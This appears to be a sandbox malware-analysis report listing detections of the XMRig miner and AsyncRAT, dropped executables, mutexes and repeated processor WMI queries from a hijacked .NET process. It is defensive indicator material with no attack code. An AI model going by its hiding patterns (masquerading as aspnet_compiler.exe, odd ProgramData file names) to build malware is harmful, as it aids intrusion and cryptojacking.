Source: Process Memory Space: aspnet_compiler.exe PID: 4628, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: AddInProcess.exe PID: 416, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Users\user\Windows.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: 52i[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 52i.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: ovrflw[1].exe.2.dr, TaskWaitBehaviorDXNNN.cs	Task registration methods: 'getMuiMappingRegisterForFullGCNotification', 'getTasksetAbbreviatedDayNames', 'RegisteredChannelsLow', 'RegisteredWaitHandlegetAceQualifier'
Source: ovrflw.exe.2.dr, TaskWaitBehaviorDXNNN.cs	Task registration methods: 'getMuiMappingRegisterForFullGCNotification', 'getTasksetAbbreviatedDayNames', 'RegisteredChannelsLow', 'RegisteredWaitHandlegetAceQualifier'

Source: ovrflw.exe.2.dr, IsWhiteSpaceUnverifiableCodeAttribute.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: ovrflw.exe.2.dr, IsWhiteSpaceUnverifiableCodeAttribute.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: ovrflw[1].exe.2.dr, IsWhiteSpaceUnverifiableCodeAttribute.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: ovrflw[1].exe.2.dr, IsWhiteSpaceUnverifiableCodeAttribute.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.mine.winEXE@73/43@9/13

Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe

Code function: 4_2_001D98E0 CoInitializeEx,CoInitializeSecurity,CoUninitialize,CoCreateInstance,CoUninitialize,SysAllocString,SysFreeString,SysFreeString,CoSetProxyBlanket,CoUninitialize,SysAllocString,SysAllocString,SysFreeString,SysFreeString,CoUninitialize,VariantClear,VariantInit,VariantClear,CoUninitialize,

4_2_001D98E0

Source: C:\Users\user\Desktop\trSK2fqPeB.exe

File created: C:\Users\user\Pictures\Illumination.pif

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Mutant created: \Sessions\1\BaseNamedObjects\8ded7976a687fa5403584f
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Mutant created: NULL
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Mutant created: \Sessions\1\BaseNamedObjects\0229f281e62ef8a44cd91793664cb790
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:984:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8084:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7192:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7476:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Mutant created: \Sessions\1\BaseNamedObjects\Over-Flow-Network
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\349587345342
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6780:120:WilError_03
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Mutant created: \Sessions\1\BaseNamedObjects\QGOn8xsapkNWVjl5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3592:120:WilError_03
Source: C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe	Mutant created: \Sessions\1\BaseNamedObjects\93ec2b129ecfa430ebf98f

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Temp\246122658369

Jump to behavior

Source: trSK2fqPeB.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: trSK2fqPeB.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
